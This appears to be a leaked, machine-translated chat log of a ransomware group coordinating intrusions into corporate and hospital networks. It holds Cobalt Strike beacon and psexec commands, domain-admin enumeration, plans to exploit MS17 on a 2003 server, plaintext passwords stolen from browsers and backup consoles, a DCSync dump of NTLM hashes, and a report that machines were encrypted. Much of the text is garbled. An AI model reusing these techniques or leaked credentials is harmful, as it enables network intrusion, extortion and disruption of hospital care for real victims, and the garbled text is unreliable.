z1WATCHGUARD can see 445,3389,139 from z1print its 135,139,445,3389 visible? i wonder what is the virus and so can be immediately downloaded through a file explorer, but he will immediately get a window print, by the way, after yesterday checked it almost immediately failed again with print pf1d2swvz1print? where you try to get into it?

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 12/02/2019 10:26:06
          dir 10/31/2020 23:01:16 Application Data
          dir 10/31/2020 23:01:16 Desktop
          dir 10/31/2020 23:01:16 Documents
          dir 07/27/2020 11:47:34 Dolby
          dir 12/03/2019 11:33:33 FileOpen
          dir 03/13/2020 13:21:33 Intel
          dir 12/02/2020 15:28:55 Lenovo
          dir 06/25/2020 15:23:07 LogiShrd
          dir 10/31/2020 22:57:39 Microsoft
          dir 11/02/2020 07:31:25 Microsoft OneDrive
          dir 12/03/2019 11:36:28:28 Nuance
          dir 12/04/2019 13:55:02 Oracle
          dir 12/04/2019 08:33:27 PM Package Cache
          dir 11/02/2020 07:29:59 Packages
          dir 11/27/2019 09:33:19 Plantronics
          dir 12/18/2020 09:56:26 regid.1991-06.com.microsoft
          dir 11/25/2019 16:46:52 RICOH_DRV
          dir 11/25/2019 16:46:41:41 SnowSoftware
          dir 12/07/2019 03:14:52:52 SoftwareDistribution
          dir 05/11/2020 00:43:57 ssh
          dir 10/31/2020 23:01:16 Start Menu
          dir 10/31/2020 23:01:16 Templates
          dir 12/03/2019 14:25:51 Trend Micro
          dir 10/31/2020 23:01:10 USOPrivate
          dir 12/07/2019 03:14:52 USOShared
          dir 12/07/2019 03:54:01 WindowsHolographicDevices
 65kb fil 11/09/2020 12:13:00 ntuser.pol


I have not been able to get a copy of the dll to the admin's dll, but I can't believe there is a trendy ehadlle there?throw it on the OS start it and the file will drop next to the dll, the dll should be removed as it will work out I give you the dll styler let's check it out)ok then in the blind echo got it, and echo 1 > test.tchto make sure that it is executed at all?) no way, whoamiv is just an extended output - does not work without /q, but without it the window will pop up
no, it worked without quotation marks, at least the dlk ran without quotation marks? it returns empty
```
remote-exec psexec 10.22.0.13 cmd /q /c tasklist /V>C:\ProgramData\ssh\task.txt
``````
itvm1:3389
Scanner module is complete
``by ip?[ ](https://mediaeveryone.com/group/gophersport-com?msg=ZSqorpgkjvXfYWBoE) `beacon> portscan itvm1 3389 none 1
[*] Tasked beacon to scan ports 3389 on itvm1
[+] host called home, sent: 93245 bytes
[-] Could not connect to pipe: 2 more port scan on the rdc dokey, then wait for the list of processes? no, psh to run it is pale? and also guys, have you checked on tpsh?trend microi tell me more ava him on the history of 104 links from there he is a frequent guest there by the way tell me his processes) and then read through access to fsvashy your task - tasklist /v write to the file + access to fsu us there is a way to run commands through psekka just) what zhnix is not dkna dk directly hanging sphere or what?yes yes, this one we're interested in? `1803 https://vcz1dc1.gophersport.local/ui/#?extensionId=vsphere.core.inventory.serverObjectViewsExtension&objectId=urn:vmomi:VirtualMachine:vm-29463:7d9aedf7-e556-4c47-b666-fb1ecbb0b35c&navigator=vsphere.core.viTree.vmsAndTemplatesView vSphere - z1jbwmsprod1 - Summary 1 0 13252634877433381 0` he has this thing `95 https://z1av.gophersport.local:4343/ Trend Micro 0 0 0 13235239439430618240 1`which url are we interested in?I know it's not in this file, is it historyWebCacheV01.dat?
it is currently open at him)) active) steal his history file so maybe he has an edge active?) yes he has 10? in general, he also has in his downloads ClickOnceForGoogleChome.exe
so maybe he uses portable chromeprocesses do not looka here hz.Observe the other question, he uses it? well his profilea it just his browser? setg Proxies socks4:185.150.190what's up, we tried to put the profile on the deck in Mozilla - does not work, asks for e-mail or something like that when I say give me a proxy then now I'm asking for a fresh version) no, it was yesterday before he left, all ready 1 minute ago said all would work so fast Directly just removed?).the archive here this folder profilesdrop it right now his browser to decode the profile in the FF need a master password plus for some reason, the directory install FF so while vpn enabled try to findbut you have YES from here?so datak this car left (through vpn man sits) would not it be better to make a mount on a remote or some server that would always have access to this network, I propose to make mounts on all trusts I started you with a mount then it is fixed in the network and try to get to the DC yes, come on?but 1 flew out the code mimodai dllpostavliv this confuheshey I have already dumped the code in the studioa here is not without DA was? `https://phanein.televisa.com.mx/vpn/indexhtml`they have 2fa (((if there are live sessions on it, you can zasvnit on `rawint.com` grid is big, I would not want to fuck it upwhen the session will come to life, fix it on any server `CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P````
Nombre de grupo Domain Admins
Comentario Designated administrators of the domain

Miembros

-------------------------------------------------------------------------------
accreco avamarexchange EndPoint
ES050616C gdtidua IWAM_GSCCORP
opera_wintel_corp operador_wintel operaproy
SCMusr t1812
Se ha completado el comando correctamente.


[+] received output:
Se procesará la solicitud en un controlador de dominio del dominio corp.televisa.com.mx.

No se ha encontrado el nombre de grupo.

Puede obtener más ayuda con el comando NET HELPMSG 2220.


[+] received output:
Se procesará la solicitud en un controlador de dominio del dominio corp.televisa.com.mx.

Nombre de alias administrators
Comentario Administrators have complete and unrestricted access to the computer/domain

Miembros

-------------------------------------------------------------------------------
accreco
Domain Admins
IWAM_GSCCORP
opera_wintel_corp
TELEVISA\Enterprise Admins.
Se ha completado el comando correctamente.

``I hope I have time to download here adinfopriyatnogo rest, in toucha well, so even sleep myself have time to be in the office 15.10 at 13:00-14:00 Moscow time :space_invader:now clean only ... if I can so tell me what time plan because I do not know and I need to set the alarm clock, leave when you come to fill the builder dllok and then turn me off here another 7-8 hours in any case, I'm dead here as alive but not alive at the same time) all like zombies need to sleep normally would like to tomorrow
or tomorrow
i'm confused, what time tomorrow?
Total servers on AD: 5
Live servers: 2
Pulled servers: 2
 
Total armies in AD: 134
Live armies: 28
Arms drawn: 18

Everything is encrypted.
``Statistics then here + finished? All dead, the last strohybild run? Before tomorrow let's go around 11, I guess, tomorrow's case studies mostly, and the day after tomorrow maybe what will go to the back? Zavata to what time, and tomorrow at what time? at 22 yes then wrap up for today@tl2 At 22 home? Neta well in principle it's almost 22 ...
@tl1 said what time tomorrow? What time? work in the morning sorry guys I have a rocket failed and I did not notice
if anything - write if any urgent issues need to prepare for closing Give me your dll, I'll throw you on the network and create a conf@user4 for you a separate task will be file sharing, ways to transfer files and other things i hope i do not need to explain that you do not shine your resources under the umbrella?you can get from /16 from heredns? @user7 check the tab gohostsokok I understand my stupor, now everything will be you strange) you throw networks where you have not yet hit a dead end and then you have no work) and dk that you get from the scan sabnets scan when you are connected to a VPN you can work well bladhound?
it won't even ask for YES without an rdp

```
of course i asked you what to do, you have several accounts, there are scanners and how to work with the vpn you know how to work there is a working vpnp i understand when the username/password does not fit yes i said that you are responsible for them? i had to directly supervise the operation? "let go"
i figured i was just a questioner here so he wouldn't even ask for yes without an rpdtam there were work options anyway why you let @user7 off so easy + i figured you and @user8 were still together and why not work with it?\tried rdp itself authorizes under these creeds? \tried rdp, so no user can walk on rdpv `lrhc.org` entsentireprise appeared admin rights in the neighboring domain, half a day tried to remove the ADinfo. Now in the next domain found a car with servakom 2003, ms17_commands work, we think to add there a local admin and already next work in my last was 2 users. from one creed did not fit, the second is 2fa. so while with @user8 worknu how are you doing?if progress on the current nets without conf confi you collect information from yourself locally as I come immediately createmne need to leave, I'll be close to 6 hours + write me back in a ls names of folders that were inside the archive all otpolzhem in personal info skilka files:thinking:@user8 you in control of their tasks, I'll ask you)he while the chief in this problem in general attack questions @user8a, just I guess I do not quite understand the indirect workd we sit next to) if you mean it?I can give you 3 people a conference on common questions. They will have their own nets, why join you in the conference? @tl1 Since @user4 and @user7 are with me, can you put them in the conference?around 6 or 7 I'll give the network with YES and we'll prepare it for closing for the most part today independently I'll give you files like him yesterday, for all questions please contact him @user4 @user7 you indirectly work with @user8 @user8 with his then so @user3 works with the forum I can not go further, can me to user8 to help Yesterday I have no access to the coba (Filling the forum by the way what are we busy?then I explain the tasks for today + so, all set? hello all wait until 20 minutes and start on the spot no one is there? hello all found
no esxi no movement? on esxi don't roll[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=7yppCGXDeHNw3hNpo) here's ftp access in esxi no shell ftp one? on esxi it's not linux but its own shell what is it on esx and web ftp let me in? the second rubric
```
https://10.75.0.170/web/bin/index.html#/welcome
Admin
G0F0rw@rd123!
``rubrik https://10.1.0.171/web/bin/index.html#/welcome
admin
G0F0rw@rd123![ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=9zcmXRPSE2nomWzvh) did not come upa through the center did not have access to them? but they do not go to esx at all, if only by schnet
Nothing in the mail, the mail is on gmail.
the keylog is hung up?
www.crispregional.org
ip207-70.crispregional.org
myhealth.main.crispregional.org
www.myhealth.main.crispregional.org
pocketpc.main.crispregional.org
view.crispregional.org
www.view.crispregional.org
vpn.crispregional.org
www.vpn.crispregional.org
webmail.crispregional.org
zix01.crispregional.org

``Fill in the cmd in the mail, didn't you find any?
3675 Objects returned
I don't know how many unique hashes there are? Wouldn't that be too much for the money?
for brute force hashes on hashes, can i fuck all the dsink on kmd5? and on vime, which was encrypted yesterday? i don't know where or how anything yet
looking for the ehshehs' credentials.
no wonder they restored it
They have backups on the xyxes + two Rubrics
in the first three clusters in each of them replicated backups so what do we have here? until mondaykazavtra what time is it? well well today i can not do it too then tomorrow nashili esx's
But I don't feel like closing today.
there are a lot of servers and a lot of armies - it will take about 6 hours[ ](https://mediaeveryone.com/group/lrhc-org?msg=cvpLBAf6fAYTHaEQ9) barely))) chanson has the mb file where are you? I think they found the password to the esx, how long are you going to sit?
https://login.sophos.com/login.sophos.com/oauth2/v2.0/authorize,04/30/2020 9:53:35 AM,13232732015862662,smhanson@lrhc.org,Menu12762
``````
User name shanson
Last logon 12/18/2020 3:22:23 PM
 
User name gsnelson
Last logon 12/19/2020 2:57:41 PM
If they were here today, they will be here tomorrow, too Check the latest Lastlogon of the right guys cobalt is quite capable of it no? @tl2 do we have a keylogger? I'll check my mail on my desk, on a piece of paper)) so it could stay in the mail correspondence do not want the guys to keep passwords from the sphere
Sophos
Shanson@lrhc.org
2476.Fgjd

``He's not there yet, have you checked the mail? But it's empty, I told you we opened these files
but it did not work doghttp://snapcraft.io/install/onenote-desktop/ubuntu#install and still waiting for @tl2 if he solves the problem) try to get on this machine and look there but there are no passwords to the sphere you have not forgotten about the ndp on ntlm? then move on to more complicated methods of the browser, pick up the password to the file) put on the deck and see this thing `s?
https://www.bitrecover.com/free/onenote-viewer/
I really want to test something))) Please give me the .one file.
Take the help of OneNote Converter
. This software allows you to read OneNote file without OneNote installation. This software also provides many advanecd features. With this software, users can easily convert OneNote to PDF, Onenote to DOC, DOCX, OneNote to Image (png, jpg, tiff, bmp, and giff).
``that kind of thing''.
https://www.quora.com/How-can-a-person-read-a-OneNote-file-without-OneNote
OneNote with DOCX, DOCX DOCX, OneNote DOCX, OneNote DOCX, DOCX DOCX, OneNote DOCX, DOCX, OneNote DOCX, OneNote DOCX, DOCX, jpg, tiff, bmp, bmp, bmp, bmp, cmp, cmp) - it works with the table in the ehel if there is no one there already - there is a file with passwords password-protected - please send it here - it is not working from the browser - does the file format work - there is no clerks6 hours idltimezalyut if no one there already has time on the car where you took it - it says software not licensed - found OneNote with notes about the whole sphere - downloaded but not opened
Host Name: PMA2013
OS Name: Microsoft(R) Windows(R) Server 2003 Standard x64 Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Additional/Backup Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Eleah
Registered Organization:
Product ID: 76869-644-7406004-50507
Original Install Date: 10/10/2013, 11:47:49 PM
System Boot Time: 7/27/2020, 11:46:57 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 4 Processor(s) Installed.
                           [01]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
                           [02]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
                           [03]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
                           [04]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 6/22/2012
Windows Directory: C:\WINDOWS
System Directory: C:WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-06:00) Central Time (US & Canada)
Total Physical Memory: 8,191 MB
Available Physical Memory: 5,839 MB
Virtual Memory: Max Size: 11,827 MB
Virtual Memory: Available: 10,167 MB
Virtual Memory: In Use: 1,660 MB
Page File Location(s): C:\pagefile.sys
Domain: PMASC.LOCAL
Logon Server:              \PMA2013

```
192.168.0.247
Some random domain I found ``
--- Chromium Credential (User: shanson) ---
URL : https://app.smartsheet.com/
Username : shanson@lrhc.org
Password : 2476.Fgjd

--- Chromium Credential (User: shanson) ---
URL : https://noc/
Username : lrhc\shanson
Password : 279.smh

--- Chromium Credential (User: shanson) ---
URL : http://10.10.36.11/
Username : 8523
Password : 1919

--- Chromium Credential (User: shanson) ---
URL : https://login.oracle.com/
Username : shanson@lrhc.org
Password : 2476.Fgjd

--- Chromium Credential (User: shanson) ---
URL : https://lrhesx7.lrhc.local/
Username : root
Password :

``[ ](https://mediaeveryone.com/group/lrhc-org?msg=jzfMpvvypunrxQXcA) a good question on write a request to the conf + gofer as soon as you tighten everything already begins to noise Well, I understand that all the noise from the fact that it works in a lot of threads ... well, if you pre-tighten everything and mate, it is quite, no? and our programmers can not adjust it to make less noise?our programmers can not adjust it to make it quieter? in 6 hours after launch?) i.e. for 6 and 6 for the process itself ehei you either finish everything in 12 hours as soon as you start the countdown immediately it seems to me gofer is not such a bad idea)) yup, we scanned all the ports and i knocked on each ... blahanetu in the field cc1) put yourself winscp software
2) upload sox from the net (better from some techie's car or even a DA)
3) run the crescendos of all involved in the sphere on port 22 by ip once one pair of accessesthen the next quest for you) you will be in linuxdavay i need one as a volunteer i have touched it recently`Thursday, December 10, 2020 8:59:03 AM `call it in center and the admin from esxxi definitely in work or they would not keep it 5 years they have at least 5 years)`
Monday, March 23, 2015 3:30:26 PM
``missing`` I personally discounted it not long ago it was clear to everyone so?
dn:CN=LRHVCENTER1,OU=Infrastructure Servers,OU=LRHC Servers,DC=lrhc,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>objectClass: computer
>cn: LRHVCENTER1
>description: lrhvcenter1.lrhc.local
>distinguishedName: CN=LRHVCENTER1,OU=Infrastructure Servers,OU=LRHC Servers,DC=lrhc,DC=local
>instanceType: 4
>whenCreated: 20150323153026.0Z
>whenChanged: 20201210085903.0Z
>uSNCreated: 70143429
>uSNChanged: 4266849973
>name: LRHVCENTER1
>objectGUID: {4207C326-1250-45A8-B8DD-A8CAE3E8BEDB}
>userAccountControl: 4096
>badPwdCount: 0
>codePage: 0
>countryCode: 0
>badPasswordTime: 0
>lastLogoff: 0
>lastLogon: 132525179438078873
>localPolicyFlags: 0
>pwdLastSet: 132515225330348320
>primaryGroupID: 515
>objectSid: S-1-5-21-11880765-1498958316-1734353810-13045
>accountExpires: 9223372036854775807
>logonCount: 6778
>sAMAccountName: LRHVCENTER1$
>sAMAccountType: 805306369
>operatingSystem: unknown
>operatingSystemVersion: unknown
>operatingSystemServicePack: Likewise Open unknown.unknown.unknown
>dNSHostName: lrhvcenter1.lrhc.local
>servicePrincipalName: HOST/lrhvcenter1
>servicePrincipalName: HOST/lrhvcenter1.lrhc.local
>objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=lrhc,DC=local
>isCriticalSystemObject: FALSE
>dSCorePropagationData: 20201104221959.0Z
>dSCorePropagationData: 20200814152314.0Z
>dSCorePropagationData: 20190403161636.0Z
>dSCorePropagationData: 20180822143249.0Z
>dSCorePropagationData: 16010714042017.0Z
>lastLogonTimestamp: 132520643431981435
>msDS-SupportedEncryptionTypes: 28
``Give sphere info from ad infosIt's weird, I'm poking around in admin balloons, they have a bunch of installers there, a bunch of scripts to install/update/disable updates, etc. but never came across anything related to vsphere or veeam...OK `Yes - LA on trust` so nmsapps admin on dc means group yes - LA on entry point in this domain rolls crosshairs from lrhassmate pass from yes in different domains, kerb, yes - LA on trust? the old grandfather way `shell dir` how did it go? fine
[DC] 'ELEAH.LOCAL' will be the domain
[DC] 'ELEAHSERVER.ELEAH.LOCAL' will be the DC server
[DC] Exporting domain 'ELEAH.LOCAL'
502 krbtgt e8918ed4b8b1668372062801927f63a0 514
1001 SUPPORT_388945a0 7729dd0e99ae60caf19c16a092806ec3 66050
1606 IUSR_LRHSERVER 5aa5a0b9479b650986ff3813c1001099 66080
1605 IWAM_LRHSERVER bcd628fd257150c2a675f7d5f690ef7f 66080
1003 ELEAHDC$ 94bd64ce8fa6418a468473838c09cc43d2 4096
2105 D97Y5YG1-ASHLEY$ 4c50c09420686cd0a57d4d274f1200eb 4096
2151 BSS-DELL-LT$ 759debf0dd78790e21d6b4f6587a2080 4096
2154 TMM-LENOVO$ ec3478f99f1417c00bf4675c8bfdd111 4096
2166 ELEAH-100$ fb42aff93322daebf4b1c2b04381ed04 4096
2173 ELBOW-EVA$ 8bcd6e801a600896ffa212171767eb3397 4096
2147 ELEAH-2C0CBE034$ c8475d926cf8c01281797701ee6a9d3d 4096
2175 ELBOW-101$ 20f05f5be373ac86bb1b191f74ad0ac4 4096
2182 CIS-1$ 430cdb97aaab660ed9b431e19914fc36 4096
2184 TMM-6400$ 17f53fe9a7d61bff56bdc274cb085712 4096
2150 HOFFMANCLINIC$ 8853f2ea7eb67386d9492a33c662449c 4096
2123 ELBOW-31$ c36dca6a0fb368486a6b1277fbcf8aac 4096
2178 ELBOW-81$ 067da0f2f070e5a7701ef7fdffc88b95 4096
2193 LIME$ a271cef0c286ce9bb13ba2a2146613 4096
2197 E6400_TMM$ 154b55c6ee70c8348d2cd73ff37cbd37 4096
2202 WebAdmin $ 83fdf8f37840cf8e171223c0de1b16eb 66048
2141 PAM1$ 6d680f3785c558d60be1089f85be680b 4096
2104 D9NRDNH1-BSS$ 6d2a65c5202a1e20f9571d1aadacb30e 4096
2211 ELBOW-114$ e9788cba0ebac08894ac2594f84a2d13 4096
2210 BSS$ 1253830b83d4a50d0d5d89a5ffebca2b 4096
2131 ELBOW-23$ abaa96e48dcd800a1956368691e830c8 4096
2140 MLS1$ 23f85b04f30c79f4bcd84b7b7d5e888d 4096
2220 ELBOW-57$ f795c9c36119d3aca086f0b815678378 4096
2217 ELBOW-14$ 39151df3ef17c84716df58ea56e8a415 4128
2149 ACERASPIRE1$ 5f174595230b7af9e7da590c67cec747 4096
2232 LCA-TABLET$ 0eb7d994c7c21ecf65f24f403496993c 4096
2235 IWAM_ELEAHSERVER fa33eb92bc4e33cb808ae4f426f52974 66080
2185 TMM-E6400$ 4b3d39b7ac88fb0eab91cbb1e7832181 4096
2234 ELBOW-DEB$ dce6fa3ecaf59fee0beb6eef23ff11e1 4096
2129 ELBOW-18$ 3d7a43744425f993ccebc658f7cefefef3 4096
2192 ELBOW-47$ 54012bc42e85be99b28c6100fe8595ff 4096
2112 ELBOW-122$ 06d1aceb9425cda01ac3ab1ba38343dc 4096
2207 ELBOW-90$ 4d801bd38128d0226f3b3355c1688ff2 4096
2177 ELBOW-322$ e4bb9151c5a6932431bfb352393ecba6 4096
2233 ACER-TMM$ d1418266362c9a75462ff5c6db09fe64 4096
2273 ELBOW-00$ aa97eb43126e70b34962544040117143 4096
2309 ADMINLAPTOP$ 90f4876c62856294b790f6e4d105541d 4096
2180 DFQH7SF1-CHERY$ 26e95f4d404c4a115d7d29381e8ac0cf 4096
2277 AC45A1CA-9A0C-4C9B-8 2ffb9c1ae2b5840acf2e0748129bba60 514
2361 ELBOW-123$ c419b2a25695936ef44e6c4f3cbde7d5 4098
2363 ELBOW-124$ e7b696f8741f96c95bab7f6421b4e209 4096
2367 ELBOW-128$ 087348e7f655e3770d9bbd66541d0e12 4096
2368 ELBOW-151$ 3b01e7331b20d40450330468969788e8 4096
2374 ELBOW-131$ 9fbc5a76dde43637aa57bffda728ea88 4096
2114 ELBOW-11$ ea367a201981ebe6aa92053c1b21493d 4096
2158 HOSP-PHARM$ b1c6e3798e4931af5e3b16eac81c9c6b 4096
2189 LBERG-LENOVOLT$ 590f000e8ee72aaabb71e3c28e2137bf 4096
2142 ELBOW-30$ 201cc04cececc2bb10b2a9c9c9cdf50a9613 4096
2397 MOTION1700$ 9ebfca863d35ba58227dcde5b5d46efc 4096
2155 MEDIC-AIR$ 377877e93baa394efbfcd77902d500 4096
2396 YOUR-T0YNI9DL4P$ 63928409f36d079b113f478ac545298a 4096
2206 ELBOW-34$ 1c6bcb4d36722b0e9dc5e59fdf18cacc 4096
2162 BIOLAPTOP-$ 29806235ecbc6d6340dfabb57f1c6927 4096
2244 ELBOW-59$ 62b601c27f74069136888a5b72db4797 4096
2209 ELBOW-54$ 952bbb508c6a48d5a72d5124f31edace 4096
2169 ELBOW-52$ f71f643018f02de46e081592812e0cc6 4096
2501 GREG-PC$ c594a1965f7c3fb23ce0dcb70207f57e 4096
2517 ELBOW-163$ 8f3dbbc6aa56fb7ccc030ba6c252d1a8 4096
2219 ELBOW-56$ ae7f06593d96e4fd64e60f0e21adb847 4096
2132 ELBOW-22$ 918f0ec2257a3338783de0af42fbba78 4096
2133 ELBOW-17$ fff2b2fc2ed9c6379f9274f16330fd14 4096
2191 ENCORE-XP$ 541136d932e9448cc178c833553b7331 4096
2134 ELBOW-16$ 6df9d74345c0d961c612433220af1fc1 4096
2165 ELBOW-39$ 30b840855273c13f5c67a4c9e025e67b 4096
2607 TERMINAL-VM$ 2073bd7749217b74916e91b17730fdae 4096
2606 PRAIRIERIDESP$ 38032fd1b9214dfa80d2607b791e9e6f 4096
2558 ELBOW-180-THINK$ fbd70668c408fea7c55276c7be780f2f 4096
2615 WINSERVER2012$ be09c89120c41f54c60d06ab4c5c0081 4096
2709 PRAIRIE-CCDA40D$ d6765c500e6625747f6dea6a9806dcad 4096
2370 ELBOW-133$ 9bff137ddce8110f35f734d2b7284d2a 4096
2637 ELBOW-256-2013$ bce01b884962dde1e8450620e018fa8d 4096
2270 LARRY-PC$ 979798807909392c993f9e1c3241a1b7 4096
2110 ELBOW-4$ 68818556c560fd8035e55f37b82ae45 4096
2738 ELSTERILEWKRM$ 13fd5fa6b22fd54e4c51b2cc31ace535 4096
2748 EL1F30$ 7e48f2391697a2f95c6ae1252c8c53fc 4096
2824 ELXX$ 0fac33f533439089096db7201e96afcb 4096
2456 FUJITSUTAB1$ 115d8606dd3e43a6891f54822dc29f4c 4096
2600 ELBOW-SCHOOLNUR$ 504233b467d9a3644003caf73a2be6e7 4096
2267 ELBOW-HOF$ 8d2b6da430466199702322aebfd7cd7c 4096
2747 EL1F31$ a90f7c64f20367a886d59bde26258127 4096
2695 TOM-THINK$ eb69e6af6620def9fa500df24f8f6429 4096
2153 ELBOW-41$ 8e78f6dd19f63f84fd67d5463d89a93a 4096
2869 ELBOW-330$ cbaed6fcf9bf608a0729b51d7ce3d3b7 4096
2882 LENOVO-TC-PC$ e303853867f813bbdf6b1c092695d79 4096
2883 LENOVO-THINK-PC$ b0ee178054f615cd864811cb36addb03 4096
2884 LENOVO-EL-PC$ fb5ac93d067bae2265535df6c593f395 4096
2120 ELBOW-25$ 8c23af14df01cbf72e5a9259f27a08d7 4096
2892 DELL-VOSTRO-PC$ 489b9dc3d13f8e928f4dad56921ff98d 4096
2638 ELBOW-255-2013$ d55aba3efaf1dbcaeedc4dca0e7c83c3 4096
2121 ELBOW-33$ f43201f6c17d1da7f0073e6e3e92018a 4096
2762 ELC217$ a41fdab242eb2a5f59ff989cca668114 4096
2589 ELBOW-242$ 17138a59c75d8a84714e3e1791772c44 4096
2629 ELBOW-250-2013$ 4041e13faf3b2a4932b930d2ef41c4e5 4096
2742 EL1C30$ cecabded1f57b741910979d4e77a9b70 4096
2156 ELBOW-44$ 276ca91bd9cc90e7a2b690147e76cf4c 4096
2719 IT-LOANER$ e19c979e2e57e004b2975a33310a86a6 4096
2108 VOSTRO$ b0e18e40a78a2ee34b38ce4bb6df19a6 4098
2682 EXCHANGE$ c80b539c79899052a2a96edd987a95ce 4096
1244 SERVERTEST$ 6fa03485aefe980bc25576c412d5b3bc 4096
2605 XPVM$ 2420e0944baddf1bb4541a732e13a386 4096
2927 INFORMATION2B$ 6a6f2be454cfb60e98eafeca0c271459 4096
2727 ELBOWIP-113$ dcc5dbe4b040c60e3b548e59b0c79539 4098
2187 ELBOW-43$ 11b98d6b7a584abc5c444d4ce52c2190 4096
2272 ELEAH-985FEB5BB$ 5a0f6654fdece737c1f234d8e19906dd 4096
2987 VOSTRO-ER-PC$ a1e4b1bcf112ecebcd16f3c81276e7ac 4098
2992 PRAIRIEMED-PC$ 230356d29ff0f9b673dc6739cdc078d0 4096
2994 SPARE$ 7a1cf21e9b6206e13401a4931c07e146 4096
2993 LENOVO-ERBACKUP$ 49d11b67306bf133e7e0840966ac0f85 4098
2995 LENOVO-002$ fe514e8aab91e66c08312162f50b2c0c 4098
2959 ELBOW-88-PC$ 08c41b9fcf57df303805a9350c97161a 4098
3002 PTECH$ 605d47222050d1b67aa5f48629c5ff0c 4096
2831 ELBOWAVG$ c46098da8d85b9eff3b6bc0b255bf37b 4096
2172 ELBOW-515$ f915a4db39961f0d6a8b6160e810af1b 4096
3009 LENOVO-MORRIS$ e40cac82163ce2151668ae6f234a209e 4098
2274 ELBOW-6B609A4D4$ f9075e30a04d550f4c1b1b7bfd2430f0 4096
3010 TECH-PC$ fb050149675fcaa38b7efe9821ec4cf4 4096
3004 LDBLAPT-PC$ 5c9a4bcd1b529dc433caac2acbde7aea 4096
2122 RADIOLOGY$ a64dd04291e5d9dcb9e958f97330afd7 4096
2798 KATRINA--THINK$ 0c9b2cc9c193c810afefbeae11a150f 4096
2384 ELBOW-138$ 84ab8c5a6424612bc133a5fd73b45bc4 4096
2375 ELEAH-53$ f34eb423b56a5c4a1002f77537dab3f4 4128
2125 ELBOW-VOSTRO$ 56f708a224408677101d13d2516685da 4096
2269 TMM-LTE6400$ b56bed280f295cab8f13fd520bc380ec 4096
3018 MCTRANSCRIPTION$ 2f9f464c0ea734d6f1076afea884b078 4096
2905 ELBOWDELL$ 332bc90c22e2198c079f32a2d1c5b2e7 4096
3061 SVOLKER$ 41a8fdb2be919a751311c8388616df56 4096
1234 nshaw 7ce21f17c0aee7fb9ceba532d0546ad6 66082
2135 ELBOW-7$ 5c5171c91a00986633147bc1e59069c9 4096
2630 ELBOW-251-THINK$ 961b3fef4e9ee05964769fcc0fcb6e 4096
2389 PT-603$ 2c50f2ff4eee17d583f6aab895686701 4096
3015 JAH$ 7364e85b292df298424f85c8df07b044 4096
2128 ELBOW-20$ 38bc18ce27b88900332220d41b6dc2a7 4096
2163 eleahadmin 56ed04d8382aa5c79b45b972f505d5e8 66048
2194 ELEAHPARAGON$ c490069946a11c1ead7de5fbb1c18f25 4096
2923 ELBOW-8-PC$ 8763f93fd186f370cc82d61dfb1ad1d8 4096
3112 ASHBY-500$ e5d06448b6e7e2fbe2f4ef7d6da860da 4096
2838 KWANDER$ 318366c8a69789510ab9a809bb9f32d6 4096
3060 MANDY-THINK$ 262e4b26eba2bf0b26992026bcdeca4c 4096
3037 JUNEZLAPTOP$ aaf2cd45ce795eb783cd54e847014328 4096
3124 JJGINGERICH$ 6178ac05ff66c0c0eb6936890613e834 4096
2435 CONFERENCE$ a75484e8761eebc11a2298273f827a01 4096
2998 ELBOW-PHARMACY$ 91126f5018be5c73c705661048e68627 4098
2917 LENOVO-2-PC$ fd9885b3fea93e9628bf3efeda4989af 4098
2608 7VM$ 258fb5c3abf2ad99256c000adc3e3c33 4096
2918 LENOVO-3-PC$ 3a1c35a6a4f1d2ed1ee2f8b9307c7749 4098
3138 SOLARWINDS$ f61fc51c8c0013d26e23f1ea3ac5eead 4096
2534 ELBOW-10$ 516460f2c7647b731edcc68277c7323e 4096
2388 ELBOW-143$ 4d64f0c50cfe77adf35854b511fa55cd 4096
2668 WORDSERVER2$ 46442a45f3cb9e2f7b07dbcc9ad54810 4096
1205 admit 7814985632c77ea80185b422fb2341ce 66080
2354 copymed d4037c73ef369d1c80ffd3053d038f9c 66048
2460 timeclock a9e033fc6f050b0e4fb5eb6a8c6065ee 66048
2136 provider f2325f4793903c5e7f7f3ab62ba39e02 66048
2896 review 0c05952f0ef5da033b14ec18bc32d4b1 66048
2467 Email 43d328e11e86b309cc19c247182fa9de 66048
2382 ELBOW-136$ 90fcf3de2ff792bdff5a4f8aca37a492 4098
3001 HOSPITALCONSULT$ babfb1662026c5dec32d5b811616a241 4098
2780 EL-HOSPCHART$ 9e3bd0ddf713073ff0850d5a5d1544b3 4098
2428 shawn 4658fc68d553a589b05122c9d3c8f7f1 66048
2457 FUJITSUTAB2$ c7b1a276f4d80e172e9a5e1e2534b555 4096
1204 xray beacd80369761138f6bb0aab8fc6210e 66080
3091 ELBOW-IT$ 3be52c9fb1e361168acc8406283a0647 4098
2385 ELBOW-139$ b73c0139ea4aa91efab42ec9f5068787 4098
3188 Scope2 7ce21f17c0aee7fb9ceba532d0546ad6 66048
2170 TECH$ d272014a8e7456a476497345a94a6641 4096
3174 THEDON$ 46abc5d7c7f7add082140e725132220b 4096
2392 ELBOW-146$ 9cd2b64083ae4febe3e9c3059f498859 4098
2912 1C30$ 26ecbe63ddd019d802690a97f8b36775 4098
2909 aholmes 64f12cddaa88057e06a81b54e73b949b 66048
2679 julrich de80b750f2d4a560062938a039f927ff 66048
2726 certegra 6a4da7a5af13fcc63e338705e64b9e64 66048
3170 ddcalerts 1c2f7f3b20a7a3c512c72c6551d5c8ae 66048
3175 jjacobson 49c2d216cbfd307353083901f4f13d38 512
2411 jlarue 58e8c758a4e67f34ef9c40944eb5535b 66048
